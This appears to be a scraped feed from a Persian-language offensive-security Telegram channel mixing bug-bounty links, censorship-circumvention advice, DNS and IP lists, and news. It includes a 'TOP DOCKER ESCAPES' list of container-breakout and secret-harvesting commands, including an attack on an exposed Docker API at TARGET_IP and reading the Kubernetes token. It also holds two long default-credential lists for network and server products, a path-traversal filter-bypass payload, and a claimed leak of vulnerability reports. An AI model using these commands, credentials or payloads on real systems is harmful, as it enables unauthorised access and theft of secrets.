-
offensive security☕️ گروه : @sec_gap 💣 python : t.me/persianpylearn admin : @Onthebytes💻 #bug_bounty #offsec
Privilege escalation using Linux capabilities🍸
@mandegar_sec | channelЧитать полностью…
Group™️
Password reset checklist
@mandegar_sec | channelЧитать полностью…
Group🕊
نام کتاب : The Hacker Mindset
ترجمه شده توسط : Typhon✍️
تاریخ انتشار : 2026/1/31
+ نسخه فارسی |
#رایگان_برای_اعضای_چنل
channel : @persian_b_sec
عزیزان برای اینکه چنل بهم نریزه
کانفیگ ها و روش ها در این تاپیک قرار میگیره❤️
/channel/sec_gap/27493
#freeWorld
Cache Deception + CSPT: 👾
Turning Non Impactful Findings into Account Takeover
توجه شمارو جلب میکنم به این مقاله که نشون میده دو باگ (Cache Deception و CSPT) ، اگه هوشمندانه با هم ترکیب بشن چجوری میتونن به Account Takeover واقعی ختم بشن.
https://zere.es/posts/cache-deception-cspt-account-takeover/
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group ™️
https://github.com/4n0nymou3/cloudflare-doh-proxy
این dns over https هم جالبه
باهاش میشه twitter , youtube بدون فیلتر باز کرد
مطمن نیستم ولی طولانی مدت ممکنه ایپی ایران بخوره داخل توییتر
#DefaultCredentials
1. Cisco
User: cisco
Password: cisco
User: nsroot
Password: nsroot
User: root
Password: calvin
User: super
Password: juniper123
User: admin
Password: pfsense
User: SAP*
Password: 06071992
User: tomcat
Password: tomcat
User: ubnt
Password: ubnt
User: weblogic
Password: weblogic1
User: Admin
Password: zabbix
User: Administrator
Password: P@ssw0rd
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
GROUP ™️
@mandegar_sec | channel
746 استاد دانشگاه به سران قوا نامه زدن و درخواست کردن پلتفرمهایی مثل اینستاگرام برای همیشه مسدود بشن و هر چه سریعتر مسیر پیشرفت نرمافزارهای داخلی مهیا بشه.
Читать полностью…
http://test67.liara.run
اینرو یکی از دوستان فرستاد
اگ وصل بگید❤️🕊
وقتی در گودال هستی، دیگر لازم نیست نگران سقوط باشی.
مالون میمیرد
ساموئل بکت
دوستان dns tunnel با dnstt و ریزالور زیر کار میکنه میتونید وصل شید
2.188.21.130
به امید روزای بهتر🤍
سلام دوستان.
اپلیکیشن سایفریا ساخته شده که وقتی کانفیگی رو در محیطی غیر از تلگرام برای کسی ارسال میکنید، اون کانفیگ فیلتر نشه.
کانفیگتونو وارد میکنید. با یک کلید رمزنگاری میکنید، برای شخص مورد نظر متن رمزنگاری شده را ارسال میکنید.
شخص مقابل کلید شما و متن رمزنگاری را وارد میکند و کانفیگ را به دست می اورد.
موفق باشید❤️
(کاملا لوکال و اوپن سورس، بدون نیاز به هیچ دسترسی ای)
Web App for iOS 📱
WebApp
📎 GitHub Link:
✨ Feel free to fork the project
https://github.com/aradazr/Cypheria
App File for Android 🤖
📎 Download link available here
TOP DOCKER ESCAPES🥇
docker run -v /:/mnt -it alpine chroot /mnt
mkdir /mnt/host && mount /dev/sda1 /mnt/host
nsenter --target 1 --mount --uts --ipc --net --pid
capsh --print grep "cap_sys_admin"
docker -H tcp://TARGET_IP:2375 run -v /:/host -it alpine
cat /proc/1/cgroup | grep -i docker
find / -name docker. sock 2>/dev/null
env | grep -iE "pass | secret | key token"
uname -r
cat /var/run/secrets/kubernetes.io/serviceaccount/token
ip route show | grep default
fdisk -l | head
@mandegar_sec | GROUP™️Читать полностью…
❤️💻
🍏 سرور جدید 🇩🇪 Npv Tunnel
مناسب: همراه اول و ایرانسل 📶حجم 500 گیگ
متصل پینگ 220✅
اینترنت آزاد برای همه یا هیچ کس!
@OniyxVpn
If you are tryint to exploit a CSPT and the sequence ".." is blocked, you can try the following: ".%0a./.%0a./"
"\t", "\n" and "\r" will all be removed from the input before starting to parse
@mandegar_sec | channelЧитать полностью…
Group™️
🚨 Malicious EPUBs.
یه کمپین جدید داره از CVE-2023-44451 توی Xreader لینوکس مینت سوء استفاده میکنه.
سناریوش اینجوریه که مهاجم با Directory Traversal میره سراغ فایل های حساس، بعدش هم با پیلود پایتونی Fileless کارشو ادامه میده؛ بدون اینکه فایل مشخصی روی دیسک بذاره.
همین باعث میشه شناسایی و دیـتکت شدنش برای انتی ویروس ها و ابزارهای امنیتی خیلی سختتر بشه.
خلاصه اگه لینوکس مینت دارید یا با Xreader کار میکنید، این یکی رو دست کم نگیرید.
📄: https://bit.ly/49O6Ym3
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group™️
سعید سوزنگر، مصطفی موسوی و ایمان صیرفی از بچههای فعال آیتی دستگیر شدن. حداقلترین کاری که میتونیم بکنیم اینه که صداشون باشیم و اطلاعرسانی کنیم.
این پست رو توی گروههای مرتبط با Tech فوروارد کنید، اگه کانال دارید اسم و عکسشونو بذارید. یادتون باشه که هر کدوم از ما میتونستیم جای اونا باشیم. ✌🏻❤️
تسلیت به خانواده های داغ دار
این روزهای تلخ
درد شما، درد ماست. در غمتان شریکیم.
#DefaultCredentials - Part 2 🔐
1. VMware vCenter
User: administrator@vsphere.local
Password: Admin!23
User: admin
Password: [blank]
User: admin
Password: admin
User: admin
Password: admin
User: admin
Password: admin
User: admin
Password: password
User: root
Password: 5iveL!fe
User: admin
Password: admin
User: elastic
Password: changeme
User: admin
Password: admin
User: postgres
Password: postgres
User: SYSTEM
Password: manager
No authentication
User: tomcat
Password: tomcat
User: admin
Password: admin
User: Administrator
Password: [on device label]
User: root
Password: calvin
User: ADMIN
Password: ADMIN
User: cisco
Password: cisco
User: root
Password: [blank]
User: admin
Password: [blank]
User: ubnt
Password: ubnt
User: admin
Password: 12345
User: admin
Password: admin
User: admin
Password: [blank]
User: admin
Password: admin
User: pi
Password: raspberry
No authentication
User: USER
Password: USER
User: admin
Password: admin
User: admin
Password: password
User: admin
Password: [blank]
User: admin
Password: 1111
User: admin
Password: access
User: guest
Password: guest
No auth by default
No auth by default
User: admin
Password: password
User: admin
Password: admin123
User: admin
Password: admin
User: admin
Password: admin
User: admin
Password: admin
User: admin
Password: pfsense
User: root
Password: opnsense
User: admin
Password: admin
User: admin
Password: readwrite
User: admin
Password: [blank]
User: admin
Password: admin123
User: admin
Password: admin
User: super
Password: sp-admin
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
کلیه ویدیوها و فایلهای ارسالی توسط هانترهای ایرانی به مرکز ماهر، شامل تصاویر، ویدیوها، فایلهای PDF و مستندات متنی که بهعنوان PoC ارسال شده بودند، توسط ما بهصورت کامل استخراج و دامپ شدهاند.
نکته قابل توجه آن است که هیچیک از گزارشهای ارسالشده توسط این هانترها مورد پیگیری مؤثر قرار نگرفته است. برای مثال، در سال ۲۰۲۳ یکی از افراد وابسته به یکی از سازمانهای ایرانی یک آسیبپذیری از نوع RCE را گزارش کرده که این باگ همچنان در سامانه مربوطه بدون اصلاح باقی مانده است!!
خودتون رو برای سختتر شدن دسترسیها و خاموشی بعدی آماده کنین!
بیشتر از ۲ هفته از قطع سراسری اینترنت بینالملل در ایران میگذره، ولی حالا که بصورت موقت دسترسیها درحال برقرار شدنه، خودتون رو برای خاموشی قریبالوقوع بعدی آماده کنین:
- نصب ابزارهای ارتباطی P2P (مثل نقطهها، زنجیر، Bridgefy و Bitchat)
- نصب اپ توشه یا رستممدیا (برای دریافت اخبار از طریق ماهواره)
- تهیه استارلینک (تهیه پرریسک و نیازمند داشتن توان مالی)
- تهیه سیمکارت از کشورهای همسایه (اگر نزدیک به مرز هستید)
- بروز نگهداشتن اپهای VPN (حتی اگر درست کار نمیکردن)
و ...
👉 t.me/ircf_toolbox/16
🔍 ircf.space
@ircfspace
خب کم کم آیپی های کلودفلر باز شد
Ipin1.Oldinomi.com
104.18.32.47
chatgpt.com
chat.openai.com
open.chatgpt.com
104.18.32.47
216.239.38.120
3.160.196.89
162.159.152.4
اینارو تست کنین بجای ip های chatgpt.com
GROUP ™️Читать полностью…
@mandegar_sec | channel
#Dns
185.98.113.113
185.98.114.114
....
172.20.11.11
172.20.11.12
...
8.26.56.26
5.200.200.200
...
@mandegar_sec | channelЧитать полностью…
Group™️
کلاینت و سرورش رو میتونید از این ادرس دانلود کنید
https://5688.s3.ir-thr-at1.arvanstorage.ir/dnstt-client-linux-amd64?versionId=
https://5688.s3.ir-thr-at1.arvanstorage.ir/dnstt-server-linux-amd64?versionId=
کانتینر = ماشین مجازی نیست 🛑
خیلی از دولوپرها فکر میکنن همین که کد داخل Docker اجرا میشه، یعنی امنه.
در حالی که گاهی فقط یه فلگ اشتباه مثل --privileged یا
mount کردن
/var/run/docker.sock
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
GROUP ™️
@mandegar_sec | channel
فوووری
یه فرد ناشناس که ۲ روز پیش ایجاد شده اومده و ۳۰ هزار دلار شرط بسته روی اینکه چین تا قبل از اتمام ۲۰۲۶ به تایوان حمله میکنه !
اگر درست باشه ۳۰۰ هزار دلار برنده میشه !
همچین فردی هفته پیش ۳۰ هزار دلار روی دستگیری مادورو توسط آمریکا شرط بست و ۴۰۰ هزار دلار بنده شد !!
GROUP ™️
@mandegar_sec | channel